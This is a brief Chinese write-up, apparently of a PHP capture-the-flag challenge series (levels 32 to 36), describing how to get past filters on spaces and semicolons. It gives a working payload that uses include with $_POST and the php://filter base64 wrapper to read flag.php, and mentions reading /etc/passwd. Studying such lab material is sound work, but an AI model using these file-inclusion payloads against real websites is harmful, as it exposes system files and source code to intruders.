32

这个题过滤了空格属实有点难受，php中不用括号的有echo include等
过滤了分号可以用?>绕过。
尝试了以下，发现 include"/etc/passwd"?>可以执行成功。再去想下没有过滤$，我们可以用$_POST[1]呀include"\$_POST[1]"?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来，灵机一动，伪协议呀！完美

33

payload

?c=include$_POST[1]?>
 1=php://filter/read=convert.base64-encode/resource=flag.php
 

34，35

同33

36

将1改为a即可